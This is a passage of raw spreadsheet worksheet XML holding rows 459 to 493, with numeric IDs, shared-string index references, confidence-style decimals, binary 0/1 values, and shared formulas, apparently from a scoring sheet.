      <c r="I459" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J459" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K459" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L459" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O459" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="62">
        <v>515.0</v>
      </c>
      <c r="B460" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C460" s="63" t="s">
        <v>1565</v>
      </c>
      <c r="D460" s="62" t="s">
        <v>1566</v>
      </c>
      <c r="E460" s="62" t="s">
        <v>1567</v>
      </c>
      <c r="F460" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G460" s="62">
        <v>0.9</v>
      </c>
      <c r="H460" s="64">
        <v>1.0</v>
      </c>
      <c r="I460" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J460" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K460" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L460" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O460" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="62">
        <v>641.0</v>
      </c>
      <c r="B461" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C461" s="63" t="s">
        <v>1568</v>
      </c>
      <c r="D461" s="62" t="s">
        <v>1569</v>
      </c>
      <c r="E461" s="62" t="s">
        <v>1570</v>
      </c>
      <c r="F461" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G461" s="62">
        <v>0.95</v>
      </c>
      <c r="H461" s="64">
        <v>1.0</v>
      </c>
      <c r="I461" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J461" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K461" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L461" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O461" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="62">
        <v>651.0</v>
      </c>
      <c r="B462" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C462" s="63" t="s">
        <v>1571</v>
      </c>
      <c r="D462" s="62" t="s">
        <v>1572</v>
      </c>
      <c r="E462" s="62" t="s">
        <v>1573</v>
      </c>
      <c r="F462" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G462" s="62">
        <v>0.85</v>
      </c>
      <c r="H462" s="64">
        <v>0.0</v>
      </c>
      <c r="I462" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J462" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K462" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L462" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M462" s="62" t="s">
        <v>1574</v>
      </c>
      <c r="N462" s="62" t="s">
        <v>1575</v>
      </c>
      <c r="O462" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="62">
        <v>652.0</v>
      </c>
      <c r="B463" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C463" s="63" t="s">
        <v>1576</v>
      </c>
      <c r="D463" s="62" t="s">
        <v>1577</v>
      </c>
      <c r="E463" s="62" t="s">
        <v>1578</v>
      </c>
      <c r="F463" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G463" s="62">
        <v>0.9</v>
      </c>
      <c r="H463" s="64">
        <v>1.0</v>
      </c>
      <c r="I463" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J463" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K463" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L463" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O463" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="62">
        <v>725.0</v>
      </c>
      <c r="B464" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C464" s="63" t="s">
        <v>1579</v>
      </c>
      <c r="D464" s="62" t="s">
        <v>1580</v>
      </c>
      <c r="E464" s="62" t="s">
        <v>1581</v>
      </c>
      <c r="F464" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G464" s="62">
        <v>0.9</v>
      </c>
      <c r="H464" s="64">
        <v>1.0</v>
      </c>
      <c r="I464" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J464" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K464" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L464" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O464" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="62">
        <v>755.0</v>
      </c>
      <c r="B465" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C465" s="63" t="s">
        <v>1582</v>
      </c>
      <c r="D465" s="62" t="s">
        <v>1583</v>
      </c>
      <c r="E465" s="62" t="s">
        <v>1584</v>
      </c>
      <c r="F465" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G465" s="62">
        <v>0.85</v>
      </c>
      <c r="H465" s="64">
        <v>0.0</v>
      </c>
      <c r="I465" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J465" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K465" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L465" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O465" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="62">
        <v>856.0</v>
      </c>
      <c r="B466" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C466" s="63" t="s">
        <v>1585</v>
      </c>
      <c r="D466" s="62" t="s">
        <v>1586</v>
      </c>
      <c r="E466" s="62" t="s">
        <v>1587</v>
      </c>
      <c r="F466" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G466" s="62">
        <v>0.95</v>
      </c>
      <c r="H466" s="64">
        <v>1.0</v>
      </c>
      <c r="I466" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J466" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K466" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L466" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O466" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="62">
        <v>880.0</v>
      </c>
      <c r="B467" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C467" s="63" t="s">
        <v>1588</v>
      </c>
      <c r="D467" s="62" t="s">
        <v>1589</v>
      </c>
      <c r="E467" s="62" t="s">
        <v>1590</v>
      </c>
      <c r="F467" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G467" s="62">
        <v>0.9</v>
      </c>
      <c r="H467" s="64">
        <v>1.0</v>
      </c>
      <c r="I467" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J467" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K467" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L467" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O467" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="62">
        <v>953.0</v>
      </c>
      <c r="B468" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C468" s="63" t="s">
        <v>1591</v>
      </c>
      <c r="D468" s="62" t="s">
        <v>1592</v>
      </c>
      <c r="E468" s="62" t="s">
        <v>1593</v>
      </c>
      <c r="F468" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G468" s="62">
        <v>0.9</v>
      </c>
      <c r="H468" s="64">
        <v>0.0</v>
      </c>
      <c r="I468" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J468" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K468" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L468" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O468" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="62">
        <v>985.0</v>
      </c>
      <c r="B469" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C469" s="63" t="s">
        <v>1594</v>
      </c>
      <c r="D469" s="62" t="s">
        <v>1595</v>
      </c>
      <c r="E469" s="62" t="s">
        <v>1596</v>
      </c>
      <c r="F469" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G469" s="62">
        <v>0.95</v>
      </c>
      <c r="H469" s="64">
        <v>1.0</v>
      </c>
      <c r="I469" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J469" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K469" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L469" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O469" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="62">
        <v>1129.0</v>
      </c>
      <c r="B470" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C470" s="63" t="s">
        <v>1597</v>
      </c>
      <c r="D470" s="62" t="s">
        <v>1598</v>
      </c>
      <c r="E470" s="62" t="s">
        <v>1599</v>
      </c>
      <c r="F470" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G470" s="62">
        <v>0.9</v>
      </c>
      <c r="H470" s="64">
        <v>1.0</v>
      </c>
      <c r="I470" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J470" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K470" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L470" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O470" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="62">
        <v>1132.0</v>
      </c>
      <c r="B471" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C471" s="63" t="s">
        <v>1600</v>
      </c>
      <c r="D471" s="62" t="s">
        <v>1601</v>
      </c>
      <c r="E471" s="62" t="s">
        <v>1602</v>
      </c>
      <c r="F471" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G471" s="62">
        <v>0.8</v>
      </c>
      <c r="H471" s="64">
        <v>0.0</v>
      </c>
      <c r="I471" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J471" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K471" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L471" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O471" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="62">
        <v>1638.0</v>
      </c>
      <c r="B472" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C472" s="63" t="s">
        <v>1603</v>
      </c>
      <c r="D472" s="62" t="s">
        <v>1604</v>
      </c>
      <c r="E472" s="62" t="s">
        <v>1605</v>
      </c>
      <c r="F472" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G472" s="62">
        <v>0.9</v>
      </c>
      <c r="H472" s="64">
        <v>1.0</v>
      </c>
      <c r="I472" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J472" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K472" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L472" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O472" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="62">
        <v>1662.0</v>
      </c>
      <c r="B473" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C473" s="63" t="s">
        <v>1606</v>
      </c>
      <c r="D473" s="62" t="s">
        <v>1607</v>
      </c>
      <c r="E473" s="62" t="s">
        <v>1608</v>
      </c>
      <c r="F473" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G473" s="62">
        <v>0.9</v>
      </c>
      <c r="H473" s="64">
        <v>1.0</v>
      </c>
      <c r="I473" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J473" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K473" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L473" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O473" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="62">
        <v>1693.0</v>
      </c>
      <c r="B474" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C474" s="63" t="s">
        <v>1609</v>
      </c>
      <c r="D474" s="62" t="s">
        <v>1610</v>
      </c>
      <c r="E474" s="62" t="s">
        <v>1611</v>
      </c>
      <c r="F474" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G474" s="62">
        <v>0.9</v>
      </c>
      <c r="H474" s="64">
        <v>1.0</v>
      </c>
      <c r="I474" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J474" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K474" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L474" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O474" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="62">
        <v>1694.0</v>
      </c>
      <c r="B475" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C475" s="63" t="s">
        <v>1612</v>
      </c>
      <c r="D475" s="62" t="s">
        <v>1613</v>
      </c>
      <c r="E475" s="62" t="s">
        <v>1614</v>
      </c>
      <c r="F475" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G475" s="62">
        <v>0.85</v>
      </c>
      <c r="H475" s="64">
        <v>0.0</v>
      </c>
      <c r="I475" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J475" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K475" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L475" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O475" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="62">
        <v>1713.0</v>
      </c>
      <c r="B476" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C476" s="63" t="s">
        <v>1615</v>
      </c>
      <c r="D476" s="62" t="s">
        <v>1616</v>
      </c>
      <c r="E476" s="62" t="s">
        <v>1617</v>
      </c>
      <c r="F476" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G476" s="62">
        <v>0.85</v>
      </c>
      <c r="H476" s="64">
        <v>1.0</v>
      </c>
      <c r="I476" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J476" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K476" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L476" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O476" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="62">
        <v>1722.0</v>
      </c>
      <c r="B477" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C477" s="63" t="s">
        <v>1618</v>
      </c>
      <c r="D477" s="62" t="s">
        <v>1619</v>
      </c>
      <c r="E477" s="62" t="s">
        <v>1620</v>
      </c>
      <c r="F477" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G477" s="62">
        <v>0.85</v>
      </c>
      <c r="H477" s="64">
        <v>1.0</v>
      </c>
      <c r="I477" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J477" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K477" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L477" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O477" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="62">
        <v>1756.0</v>
      </c>
      <c r="B478" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C478" s="63" t="s">
        <v>1621</v>
      </c>
      <c r="D478" s="62" t="s">
        <v>1622</v>
      </c>
      <c r="E478" s="62" t="s">
        <v>1623</v>
      </c>
      <c r="F478" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G478" s="62">
        <v>0.95</v>
      </c>
      <c r="H478" s="64">
        <v>1.0</v>
      </c>
      <c r="I478" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J478" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K478" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L478" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O478" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="62">
        <v>1866.0</v>
      </c>
      <c r="B479" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C479" s="63" t="s">
        <v>1624</v>
      </c>
      <c r="D479" s="62" t="s">
        <v>1625</v>
      </c>
      <c r="E479" s="62" t="s">
        <v>1626</v>
      </c>
      <c r="F479" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G479" s="62">
        <v>0.85</v>
      </c>
      <c r="H479" s="64">
        <v>1.0</v>
      </c>
      <c r="I479" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J479" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K479" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L479" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O479" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="62">
        <v>1981.0</v>
      </c>
      <c r="B480" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C480" s="63" t="s">
        <v>1627</v>
      </c>
      <c r="D480" s="62" t="s">
        <v>1628</v>
      </c>
      <c r="E480" s="62" t="s">
        <v>1629</v>
      </c>
      <c r="F480" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G480" s="62">
        <v>0.95</v>
      </c>
      <c r="H480" s="64">
        <v>1.0</v>
      </c>
      <c r="I480" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J480" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K480" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L480" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O480" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="62">
        <v>2014.0</v>
      </c>
      <c r="B481" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C481" s="63" t="s">
        <v>1630</v>
      </c>
      <c r="D481" s="62" t="s">
        <v>1631</v>
      </c>
      <c r="E481" s="62" t="s">
        <v>1632</v>
      </c>
      <c r="F481" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G481" s="62">
        <v>0.9</v>
      </c>
      <c r="H481" s="64">
        <v>1.0</v>
      </c>
      <c r="I481" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J481" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K481" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L481" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O481" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="62">
        <v>2208.0</v>
      </c>
      <c r="B482" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C482" s="63" t="s">
        <v>1633</v>
      </c>
      <c r="D482" s="62" t="s">
        <v>1634</v>
      </c>
      <c r="E482" s="62" t="s">
        <v>1635</v>
      </c>
      <c r="F482" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G482" s="62">
        <v>0.85</v>
      </c>
      <c r="H482" s="64">
        <v>1.0</v>
      </c>
      <c r="I482" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J482" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K482" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L482" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O482" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="62">
        <v>2242.0</v>
      </c>
      <c r="B483" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C483" s="63" t="s">
        <v>1636</v>
      </c>
      <c r="D483" s="62" t="s">
        <v>1637</v>
      </c>
      <c r="E483" s="62" t="s">
        <v>1638</v>
      </c>
      <c r="F483" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G483" s="62">
        <v>0.9</v>
      </c>
      <c r="H483" s="64">
        <v>1.0</v>
      </c>
      <c r="I483" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J483" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K483" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L483" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O483" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="62">
        <v>2361.0</v>
      </c>
      <c r="B484" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C484" s="63" t="s">
        <v>1639</v>
      </c>
      <c r="D484" s="62" t="s">
        <v>1640</v>
      </c>
      <c r="E484" s="62" t="s">
        <v>1641</v>
      </c>
      <c r="F484" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G484" s="62">
        <v>0.9</v>
      </c>
      <c r="H484" s="64">
        <v>0.0</v>
      </c>
      <c r="I484" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J484" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K484" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L484" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O484" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="62">
        <v>2776.0</v>
      </c>
      <c r="B485" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C485" s="63" t="s">
        <v>1642</v>
      </c>
      <c r="D485" s="62" t="s">
        <v>1643</v>
      </c>
      <c r="E485" s="62" t="s">
        <v>1644</v>
      </c>
      <c r="F485" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G485" s="62">
        <v>0.9</v>
      </c>
      <c r="H485" s="64">
        <v>1.0</v>
      </c>
      <c r="I485" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J485" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K485" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L485" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O485" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="62">
        <v>3648.0</v>
      </c>
      <c r="B486" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C486" s="63" t="s">
        <v>1645</v>
      </c>
      <c r="D486" s="62" t="s">
        <v>1646</v>
      </c>
      <c r="E486" s="62" t="s">
        <v>1647</v>
      </c>
      <c r="F486" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G486" s="62">
        <v>0.85</v>
      </c>
      <c r="H486" s="64">
        <v>0.0</v>
      </c>
      <c r="I486" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J486" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K486" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L486" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O486" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="62">
        <v>4176.0</v>
      </c>
      <c r="B487" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C487" s="63" t="s">
        <v>1648</v>
      </c>
      <c r="D487" s="62" t="s">
        <v>1649</v>
      </c>
      <c r="E487" s="62" t="s">
        <v>1650</v>
      </c>
      <c r="F487" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G487" s="62">
        <v>0.95</v>
      </c>
      <c r="H487" s="64">
        <v>1.0</v>
      </c>
      <c r="I487" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J487" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K487" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L487" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O487" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="62">
        <v>4694.0</v>
      </c>
      <c r="B488" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C488" s="63" t="s">
        <v>1651</v>
      </c>
      <c r="D488" s="62" t="s">
        <v>1652</v>
      </c>
      <c r="E488" s="62" t="s">
        <v>1653</v>
      </c>
      <c r="F488" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G488" s="62">
        <v>0.9</v>
      </c>
      <c r="H488" s="64">
        <v>0.0</v>
      </c>
      <c r="I488" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J488" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K488" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L488" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O488" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="62">
        <v>4704.0</v>
      </c>
      <c r="B489" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C489" s="63" t="s">
        <v>1654</v>
      </c>
      <c r="D489" s="62" t="s">
        <v>1655</v>
      </c>
      <c r="E489" s="62" t="s">
        <v>1656</v>
      </c>
      <c r="F489" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G489" s="62">
        <v>0.9</v>
      </c>
      <c r="H489" s="64">
        <v>1.0</v>
      </c>
      <c r="I489" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J489" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K489" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L489" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O489" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="62">
        <v>5817.0</v>
      </c>
      <c r="B490" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C490" s="63" t="s">
        <v>1657</v>
      </c>
      <c r="D490" s="62" t="s">
        <v>1658</v>
      </c>
      <c r="E490" s="62" t="s">
        <v>1659</v>
      </c>
      <c r="F490" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G490" s="62">
        <v>0.85</v>
      </c>
      <c r="H490" s="64">
        <v>0.0</v>
      </c>
      <c r="I490" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J490" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K490" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L490" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O490" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="62">
        <v>6202.0</v>
      </c>
      <c r="B491" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C491" s="63" t="s">
        <v>1660</v>
      </c>
      <c r="D491" s="62" t="s">
        <v>1661</v>
      </c>
      <c r="E491" s="62" t="s">
        <v>1662</v>
      </c>
      <c r="F491" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G491" s="62">
        <v>0.95</v>
      </c>
      <c r="H491" s="64">
        <v>1.0</v>
      </c>
      <c r="I491" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J491" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K491" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L491" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O491" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="62">
        <v>6246.0</v>
      </c>
      <c r="B492" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C492" s="63" t="s">
        <v>1663</v>
      </c>
      <c r="D492" s="62" t="s">
        <v>1664</v>
      </c>
      <c r="E492" s="62" t="s">
        <v>1665</v>
      </c>
      <c r="F492" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G492" s="62">
        <v>0.85</v>
      </c>
      <c r="H492" s="64">
        <v>0.0</v>
      </c>
      <c r="I492" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J492" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K492" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L492" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O492" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="62">
        <v>7241.0</v>
      </c>
      <c r="B493" s="62" t="s">
        <v>69</v>
      </c>
